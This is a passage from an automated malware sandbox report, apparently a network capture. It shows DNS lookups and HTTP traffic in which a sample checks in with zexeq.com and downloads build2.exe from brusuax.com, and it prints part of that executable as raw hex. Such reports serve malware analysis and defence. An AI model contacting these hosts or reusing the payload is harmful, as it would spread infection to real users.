                                                                                                                                                                      Jan 12, 2024 06:48:21.632205009 CET1022049764116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.632308006 CET4976410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.632713079 CET4976410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.635505915 CET4976410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.640145063 CET4976510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.824569941 CET1022049764116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.824651957 CET4976410220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.830771923 CET1022049765116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:21.830861092 CET4976510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:21.831244946 CET4976510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:22.019916058 CET1022049765116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:22.020051956 CET1022049765116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:22.020386934 CET4976510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:22.020765066 CET4976510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:22.023787975 CET4976510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:22.026215076 CET4976610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:22.212261915 CET1022049765116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:22.213706970 CET4976510220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:22.214705944 CET1022049766116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:22.215038061 CET4976610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:22.215536118 CET4976610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:22.404535055 CET1022049766116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:22.404637098 CET1022049766116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:22.404867887 CET4976610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:22.405411005 CET4976610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:22.408164978 CET4976610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:48:22.597124100 CET1022049766116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:22.597726107 CET4976610220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:49:29.963534117 CET1022049759116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:49:29.963562965 CET1022049759116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:49:29.963783026 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:49:54.405360937 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:49:54.405360937 CET4975910220192.168.2.4116.202.0.196
                                                                                                                                                                      Jan 12, 2024 06:49:54.594335079 CET1022049759116.202.0.196192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:49:54.594424009 CET4975910220192.168.2.4116.202.0.196

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Jan 12, 2024 06:47:54.368478060 CET5996853192.168.2.41.1.1.1
                                                                                                                                                                      Jan 12, 2024 06:47:54.603483915 CET53599681.1.1.1192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:47:57.437181950 CET6522853192.168.2.41.1.1.1
                                                                                                                                                                      Jan 12, 2024 06:47:57.443881035 CET5564653192.168.2.41.1.1.1
                                                                                                                                                                      Jan 12, 2024 06:47:58.433099985 CET5564653192.168.2.41.1.1.1
                                                                                                                                                                      Jan 12, 2024 06:47:58.433099985 CET6522853192.168.2.41.1.1.1
                                                                                                                                                                      Jan 12, 2024 06:47:59.448646069 CET6522853192.168.2.41.1.1.1
                                                                                                                                                                      Jan 12, 2024 06:47:59.448924065 CET5564653192.168.2.41.1.1.1
                                                                                                                                                                      Jan 12, 2024 06:48:00.684314013 CET53556461.1.1.1192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:00.684350967 CET53556461.1.1.1192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:00.684361935 CET53556461.1.1.1192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.015427113 CET53652281.1.1.1192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.015460014 CET53652281.1.1.1192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:01.015536070 CET53652281.1.1.1192.168.2.4
                                                                                                                                                                      Jan 12, 2024 06:48:04.375298023 CET5987553192.168.2.41.1.1.1
                                                                                                                                                                      Jan 12, 2024 06:48:04.470828056 CET53598751.1.1.1192.168.2.4

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                      Jan 12, 2024 06:47:54.368478060 CET192.168.2.41.1.1.10x8b0bStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:47:57.437181950 CET192.168.2.41.1.1.10x5a6dStandard query (0)brusuax.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:47:57.443881035 CET192.168.2.41.1.1.10x1fe0Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:47:58.433099985 CET192.168.2.41.1.1.10x1fe0Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:47:58.433099985 CET192.168.2.41.1.1.10x5a6dStandard query (0)brusuax.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:47:59.448646069 CET192.168.2.41.1.1.10x5a6dStandard query (0)brusuax.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:47:59.448924065 CET192.168.2.41.1.1.10x1fe0Standard query (0)zexeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:04.375298023 CET192.168.2.41.1.1.10x760bStandard query (0)t.meA (IP address)IN (0x0001)false

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                      Jan 12, 2024 06:47:54.603483915 CET1.1.1.1192.168.2.40x8b0bNo error (0)api.2ip.ua172.67.139.220A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:47:54.603483915 CET1.1.1.1192.168.2.40x8b0bNo error (0)api.2ip.ua104.21.65.24A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684314013 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684314013 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684314013 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684314013 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684314013 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684314013 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684314013 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684314013 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com210.182.29.70A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684314013 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684314013 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com211.181.24.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684350967 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684350967 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684350967 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684350967 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684350967 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684350967 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684350967 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684350967 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com210.182.29.70A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684350967 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684350967 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com211.181.24.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684361935 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684361935 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684361935 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684361935 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684361935 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684361935 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684361935 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684361935 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com210.182.29.70A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684361935 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:00.684361935 CET1.1.1.1192.168.2.40x1fe0No error (0)zexeq.com211.181.24.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015427113 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015427113 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015427113 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com186.13.17.220A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015427113 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015427113 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015427113 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015427113 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com181.197.76.238A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015427113 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015427113 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015427113 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015460014 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015460014 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015460014 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com186.13.17.220A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015460014 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015460014 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015460014 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015460014 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com181.197.76.238A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015460014 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015460014 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015460014 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015536070 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015536070 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com211.171.233.126A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015536070 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com186.13.17.220A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015536070 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015536070 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015536070 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015536070 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com181.197.76.238A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015536070 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015536070 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:01.015536070 CET1.1.1.1192.168.2.40x5a6dNo error (0)brusuax.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                                                                      Jan 12, 2024 06:48:04.470828056 CET1.1.1.1192.168.2.40x760bNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • api.2ip.ua
                                                                                                                                                                      • t.me
                                                                                                                                                                      • zexeq.com
                                                                                                                                                                      • brusuax.com

                                                                                                                                                                      HTTP Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.449733175.120.254.9807608C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Jan 12, 2024 06:48:00.969908953 CET137OUTGET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: zexeq.com


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      1192.168.2.449732175.120.254.9807596C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Jan 12, 2024 06:48:00.971760035 CET126OUTGET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: zexeq.com


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      2192.168.2.449734186.147.159.149807608C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Jan 12, 2024 06:48:01.179519892 CET91OUTGET /dl/build2.exe HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: brusuax.com
                                                                                                                                                                      Jan 12, 2024 06:48:01.900572062 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                      Date: Fri, 12 Jan 2024 05:48:01 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 367104
                                                                                                                                                                      Last-Modified: Wed, 10 Jan 2024 12:50:02 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      ETag: "659e927a-59a00"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 60 e6 e8 d7 24 87 86 84 24 87 86 84 24 87 86 84 3a d5 13 84 35 87 86 84 3a d5 05 84 76 87 86 84 3a d5 02 84 00 87 86 84 03 41 fd 84 27 87 86 84 24 87 87 84 78 87 86 84 3a d5 0c 84 25 87 86 84 3a d5 12 84 25 87 86 84 3a d5 17 84 25 87 86 84 52 69 63 68 24 87 86 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 02 ae 12 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0e 04 00 00 b4 01 00 00 00 00 00 94 22 00 00 00 10 00 00 00 20 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 05 00 00 04 00 00 57 7d 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 55 04 00 28 00 00 00 00 10 05 00 ca c1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 48 04 00 18 00 00 00 58 48 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 04 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 79 0d 04 00 00 10 00 00 00 0e 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 3d 00 00 00 20 04 00 00 3e 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 97 00 00 00 60 04 00 00 86 00 00 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 a1 01 00 00 00 00 05 00 00 02 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ca c1 00 00 00 10 05 00 00 c2 00 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$`$$$:5:v:A'$x:%:%:%Rich$PELd" @W}\U(HXH@ t.texty `.rdata= >@@.data|`P@.tls@.rsrc@@
                                                                                                                                                                      Jan 12, 2024 06:48:01.901360989 CET1286INData Raw: 56 8d 44 24 08 50 8b f1 e8 b8 0a 00 00 c7 06 b4 21 44 00 8b c6 5e c2 04 00 c7 01 b4 21 44 00 e9 c9 0b 00 00 56 8b f1 c7 06 b4 21 44 00 e8 bb 0b 00 00 f6 44 24 08 01 74 07 56 e8 84 0e 00 00 59 8b c6 5e c2 04 00 8b 44 24 08 8a 00 8b 4c 24 04 88 01
                                                                                                                                                                      Data Ascii: VD$P!D^!DV!DD$tVY^D$L$D$P@u+UuuuuVE]Uuuuu[E]j'DueuN!DVjjN!D^y
                                                                                                                                                                      Jan 12, 2024 06:48:01.901696920 CET324INData Raw: c3 ff 74 24 04 e8 6e 02 00 00 59 c2 04 00 6a 44 b8 ce 1c 44 00 e8 5c 12 00 00 68 40 48 44 00 8d 4d d8 e8 6d fc ff ff 83 65 fc 00 8d 45 d8 50 8d 4d b0 e8 62 fb ff ff 68 30 54 44 00 8d 45 b0 50 c7 45 b0 d8 21 44 00 e8 d9 0d 00 00 cc 6a 04 e8 e8 0a
                                                                                                                                                                      Data Ascii: t$nYjDD\h@HDMmeEPMbh0TDEPE!DjYt03t$MYjYVt$!D^jXjD}uvu%3j[OMmU;sjX+;w4eFjPYY
                                                                                                                                                                      Jan 12, 2024 06:48:01.901711941 CET1286INData Raw: 00 6a 01 8b cf e8 ac fc ff ff ff 75 0c 8b cf 89 5f 04 89 77 18 e8 16 fe ff ff e8 eb 11 00 00 c2 08 00 8b 4d e8 33 f6 56 6a 01 e8 87 fc ff ff 56 56 e8 ab 0c 00 00 cc 83 7c 24 04 00 56 74 2d 8b 71 18 8d 41 04 83 fe 10 72 04 8b 10 eb 02 8b d0 39 54
                                                                                                                                                                      Data Ascii: ju_wM3VjVV|$Vt-qAr9T$rrI;L$v2^jYjt$YYUMw3QJY3seEPMhhTDEPE!DVt$!
                                                                                                                                                                      Jan 12, 2024 06:48:02.062570095 CET1286INData Raw: 43 04 57 74 31 85 c0 74 27 50 e8 41 07 00 00 8b f8 47 57 e8 a0 15 00 00 59 59 89 46 04 85 c0 74 18 ff 73 04 57 50 e8 5c 14 00 00 83 c4 0c eb 09 83 66 04 00 eb 03 89 46 04 5f 8b c6 5e 5b 5d c2 04 00 8b ff 55 8b ec 53 8b 5d 08 56 57 8b f9 3b fb 74
                                                                                                                                                                      Data Ascii: CWt1t'PAGWYYFtsWP\fF_^[]US]VW;tACGCt1t'PFVEYYGtsVPgG_^[]y0"DtqYAu8"DUVEPP"D^]UVuP"D
                                                                                                                                                                      Jan 12, 2024 06:48:02.063606977 CET1286INData Raw: c0 74 0f ff 75 08 e8 a7 10 00 00 59 85 c0 74 e6 c9 c3 f6 05 0c e6 44 00 01 be 00 e6 44 00 75 19 83 0d 0c e6 44 00 01 8b ce e8 a3 ff ff ff 68 65 1d 44 00 e8 1e fe ff ff 59 56 8d 4d f4 e8 95 f6 ff ff 68 68 54 44 00 8d 45 f4 50 e8 85 02 00 00 cc 8b
                                                                                                                                                                      Data Ascii: tuYtDDuDheDYVMhhTDEPU=DuR+uy)hYY]MZf9@u6<@@PEu%f9@ut@v39@3jXhMD3uEPp Dj_}MZf9@u8<
                                                                                                                                                                      Jan 12, 2024 06:48:02.063932896 CET962INData Raw: 00 8b 45 c8 5b c9 c3 8b ff 55 8b ec 51 53 fc 8b 45 0c 8b 48 08 33 4d 0c e8 67 f4 ff ff 8b 45 08 8b 40 04 83 e0 66 74 11 8b 45 0c c7 40 24 01 00 00 00 33 c0 40 eb 6c eb 6a 6a 01 8b 45 0c ff 70 18 8b 45 0c ff 70 14 8b 45 0c ff 70 0c 6a 00 ff 75 10
                                                                                                                                                                      Data Ascii: E[UQSEH3MgE@ftE@$3@ljjEpEpEpjuEpuA Ex$uuujjjjjEPh#E]ck 3@[UQSVW}GwE-uAMNkM9H};H~uM]u}
                                                                                                                                                                      Jan 12, 2024 06:48:02.064420938 CET1286INData Raw: 04 00 c0 c7 05 24 e6 44 00 01 00 00 00 a1 d0 60 44 00 89 85 d8 fc ff ff a1 d4 60 44 00 89 85 dc fc ff ff ff 15 8c 20 44 00 a3 70 e6 44 00 6a 01 e8 39 3f 00 00 59 6a 00 ff 15 88 20 44 00 68 a0 22 44 00 ff 15 84 20 44 00 83 3d 70 e6 44 00 00 75 08
                                                                                                                                                                      Data Ascii: $D`D`D DpDj9?Yj Dh"D D=pDuj?Yh DP| DUWVuM};v;r=@DtWV;^_u^_]D?ur*$+@r$*@$+
                                                                                                                                                                      Jan 12, 2024 06:48:02.064956903 CET1286INData Raw: 5b e8 b6 eb ff ff c9 c3 8b ff 55 8b ec 56 ff 35 44 e9 44 00 e8 d6 05 00 00 ff 75 08 8b f0 e8 51 05 00 00 59 59 a3 44 e9 44 00 8b c6 5e 5d c3 ff 35 44 e9 44 00 e8 b5 05 00 00 59 c3 8b ff 55 8b ec 5d e9 99 fe ff ff 8b ff 55 8b ec ff 35 44 e9 44 00
